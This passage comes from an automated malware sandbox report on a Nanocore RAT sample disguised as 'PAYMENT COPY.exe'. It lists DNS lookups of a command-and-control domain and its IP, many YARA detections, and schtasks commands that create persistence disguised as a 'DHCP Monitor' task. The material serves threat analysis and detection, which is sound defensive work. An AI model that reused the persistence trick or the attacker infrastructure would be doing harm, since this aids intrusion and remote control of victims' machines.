                                                                  Feb 23, 2021 08:13:14.164246082 CET53583678.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:14.823729992 CET6059953192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:14.880944014 CET53605998.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:15.617856026 CET5957153192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:15.668433905 CET53595718.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:16.447695971 CET5268953192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:16.506561041 CET53526898.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:16.961836100 CET5029053192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:17.023086071 CET53502908.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:17.515580893 CET6042753192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:17.567055941 CET53604278.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:19.216253996 CET5620953192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:19.273304939 CET53562098.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:19.680048943 CET5958253192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:19.737291098 CET53595828.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:20.464555025 CET6094953192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:20.524211884 CET53609498.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:21.624974012 CET5854253192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:21.673666954 CET53585428.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:22.570275068 CET5917953192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:22.629508018 CET53591798.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:23.264425993 CET6092753192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:23.312992096 CET53609278.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:25.127729893 CET5785453192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:25.187793970 CET53578548.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:31.232362986 CET6202653192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:31.459999084 CET53620268.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:38.460644007 CET5945353192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:38.522447109 CET53594538.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:41.938846111 CET6246853192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:41.987490892 CET53624688.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:44.666580915 CET5256353192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:44.715342045 CET53525638.8.8.8192.168.2.7
                                                                  Feb 23, 2021 08:13:52.423085928 CET5472153192.168.2.78.8.8.8
                                                                  Feb 23, 2021 08:13:52.484493017 CET53547218.8.8.8192.168.2.7

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Feb 23, 2021 08:11:57.696343899 CET192.168.2.78.8.8.80x433Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:12:17.166829109 CET192.168.2.78.8.8.80xd7abStandard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:12:35.698424101 CET192.168.2.78.8.8.80x3462Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:12:50.250233889 CET192.168.2.78.8.8.80x992dStandard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:12:57.225146055 CET192.168.2.78.8.8.80xfb0bStandard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:13:05.064574003 CET192.168.2.78.8.8.80x28a8Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:13:11.557959080 CET192.168.2.78.8.8.80x1f5dStandard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:13:19.216253996 CET192.168.2.78.8.8.80x6412Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:13:25.127729893 CET192.168.2.78.8.8.80xafc5Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:13:31.232362986 CET192.168.2.78.8.8.80xb242Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:13:38.460644007 CET192.168.2.78.8.8.80x8293Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:13:44.666580915 CET192.168.2.78.8.8.80x1e5Standard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:13:52.423085928 CET192.168.2.78.8.8.80xbe7cStandard query (0)chinomso.duckdns.orgA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Feb 23, 2021 08:11:57.916781902 CET8.8.8.8192.168.2.70x433No error (0)chinomso.duckdns.org185.150.24.55A (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:12:17.393465996 CET8.8.8.8192.168.2.70xd7abNo error (0)chinomso.duckdns.org185.150.24.55A (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:12:35.756969929 CET8.8.8.8192.168.2.70x3462No error (0)chinomso.duckdns.org185.150.24.55A (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:12:50.470235109 CET8.8.8.8192.168.2.70x992dNo error (0)chinomso.duckdns.org185.150.24.55A (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:12:57.453453064 CET8.8.8.8192.168.2.70xfb0bNo error (0)chinomso.duckdns.org185.150.24.55A (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:13:05.124604940 CET8.8.8.8192.168.2.70x28a8No error (0)chinomso.duckdns.org185.150.24.55A (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:13:11.619239092 CET8.8.8.8192.168.2.70x1f5dNo error (0)chinomso.duckdns.org185.150.24.55A (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:13:19.273304939 CET8.8.8.8192.168.2.70x6412No error (0)chinomso.duckdns.org185.150.24.55A (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:13:25.187793970 CET8.8.8.8192.168.2.70xafc5No error (0)chinomso.duckdns.org185.150.24.55A (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:13:31.459999084 CET8.8.8.8192.168.2.70xb242No error (0)chinomso.duckdns.org185.150.24.55A (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:13:38.522447109 CET8.8.8.8192.168.2.70x8293No error (0)chinomso.duckdns.org185.150.24.55A (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:13:44.715342045 CET8.8.8.8192.168.2.70x1e5No error (0)chinomso.duckdns.org185.150.24.55A (IP address)IN (0x0001)
                                                                  Feb 23, 2021 08:13:52.484493017 CET8.8.8.8192.168.2.70xbe7cNo error (0)chinomso.duckdns.org185.150.24.55A (IP address)IN (0x0001)

                                                                  Code Manipulations

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  Analysis Process: PAYMENT COPY.exe PID: 6392 Parent PID: 5664

                                                                  General

                                                                  Start time:08:11:48
                                                                  Start date:23/02/2021
                                                                  Path:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\PAYMENT COPY.exe'
                                                                  Imagebase:0x400000
                                                                  File size:332412 bytes
                                                                  MD5 hash:53E8C460446FE305DFC2159961AA6234
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.242328677.0000000002A80000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000000.00000002.242328677.0000000002A80000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.242328677.0000000002A80000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.242328677.0000000002A80000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: PAYMENT COPY.exe PID: 6432 Parent PID: 6392

                                                                  General

                                                                  Start time:08:11:49
                                                                  Start date:23/02/2021
                                                                  Path:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\PAYMENT COPY.exe'
                                                                  Imagebase:0x400000
                                                                  File size:332412 bytes
                                                                  MD5 hash:53E8C460446FE305DFC2159961AA6234
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.498580778.0000000000599000.00000004.00000020.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.498580778.0000000000599000.00000004.00000020.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.498580778.0000000000599000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.500337236.0000000000730000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.500337236.0000000000730000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.499927530.00000000006C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.499927530.00000000006C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.500528462.0000000000780000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.500528462.0000000000780000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.505736368.000000000341C000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.500087557.00000000006E0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.500087557.00000000006E0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.500417911.0000000000750000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.500417911.0000000000750000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.501309782.0000000002391000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.499796910.00000000006B0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.499796910.00000000006B0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.500251784.0000000000710000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.500251784.0000000000710000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.499394347.0000000000660000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.499394347.0000000000660000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.500213366.0000000000700000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.500213366.0000000000700000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.500144000.00000000006F0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.500144000.00000000006F0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.499506090.0000000000680000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.499506090.0000000000680000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.499715879.00000000006A0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.499715879.00000000006A0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.504422573.00000000027A5000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000001.00000003.401079389.0000000003861000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: schtasks.exe PID: 6532 Parent PID: 6432

                                                                  General

                                                                  Start time:08:11:55
                                                                  Start date:23/02/2021
                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpEEDF.tmp'
                                                                  Imagebase:0xe90000
                                                                  File size:185856 bytes
                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: conhost.exe PID: 6548 Parent PID: 6532

                                                                  General

                                                                  Start time:08:11:55
                                                                  Start date:23/02/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff774ee0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: schtasks.exe PID: 6596 Parent PID: 6432

                                                                  General

                                                                  Start time:08:11:56
                                                                  Start date:23/02/2021
                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpF23B.tmp'
                                                                  Imagebase:0xe90000
                                                                  File size:185856 bytes
                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: conhost.exe PID: 6604 Parent PID: 6596

                                                                  General

                                                                  Start time:08:11:56
                                                                  Start date:23/02/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff774ee0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: PAYMENT COPY.exe PID: 6612 Parent PID: 1104

                                                                  General

                                                                  Start time:08:11:56
                                                                  Start date:23/02/2021
                                                                  Path:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\PAYMENT COPY.exe' 0
                                                                  Imagebase:0x400000
                                                                  File size:332412 bytes
                                                                  MD5 hash:53E8C460446FE305DFC2159961AA6234
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.264472405.0000000002A60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.264472405.0000000002A60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.264472405.0000000002A60000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.264472405.0000000002A60000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: PAYMENT COPY.exe PID: 6712 Parent PID: 6612

                                                                  General

                                                                  Start time:08:11:58
                                                                  Start date:23/02/2021
                                                                  Path:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\PAYMENT COPY.exe' 0
                                                                  Imagebase:0x400000
                                                                  File size:332412 bytes
                                                                  MD5 hash:53E8C460446FE305DFC2159961AA6234
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.278420831.0000000002460000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.278034704.00000000007CE000.00000004.00000020.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.278034704.00000000007CE000.00000004.00000020.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.278034704.00000000007CE000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.278506705.000000000344C000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.278506705.000000000344C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.278355916.0000000002411000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.278466609.0000000003411000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.278466609.0000000003411000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.278466609.0000000003411000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.279255629.00000000049C2000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.279255629.00000000049C2000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.279255629.00000000049C2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.279026119.00000000048F0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000002.279026119.00000000048F0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.279026119.00000000048F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.279026119.00000000048F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000001.257730823.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000001.257730823.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000001.257730823.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000008.00000001.257730823.0000000000400000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: dhcpmon.exe PID: 6744 Parent PID: 1104

                                                                  General

                                                                  Start time:08:11:58
                                                                  Start date:23/02/2021
                                                                  Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
                                                                  Imagebase:0x400000
                                                                  File size:332412 bytes
                                                                  MD5 hash:53E8C460446FE305DFC2159961AA6234
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 35%, ReversingLabs
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: dhcpmon.exe PID: 5932 Parent PID: 3292

                                                                  General

                                                                  Start time:08:12:07
                                                                  Start date:23/02/2021
                                                                  Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                                                                  Imagebase:0x400000
                                                                  File size:332412 bytes
                                                                  MD5 hash:53E8C460446FE305DFC2159961AA6234
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.286656662.0000000002A50000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000E.00000002.286656662.0000000002A50000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.286656662.0000000002A50000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.286656662.0000000002A50000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: dhcpmon.exe PID: 2896 Parent PID: 5932

                                                                  General

                                                                  Start time:08:12:09
                                                                  Start date:23/02/2021
                                                                  Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                                                                  Imagebase:0x400000
                                                                  File size:332412 bytes
                                                                  MD5 hash:53E8C460446FE305DFC2159961AA6234
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.298632979.00000000022E0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000002.298228465.000000000054A000.00000004.00000020.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.298228465.000000000054A000.00000004.00000020.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.298228465.000000000054A000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.298702640.00000000032CC000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.298702640.00000000032CC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000002.298677896.0000000003291000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.298677896.0000000003291000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.298677896.0000000003291000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
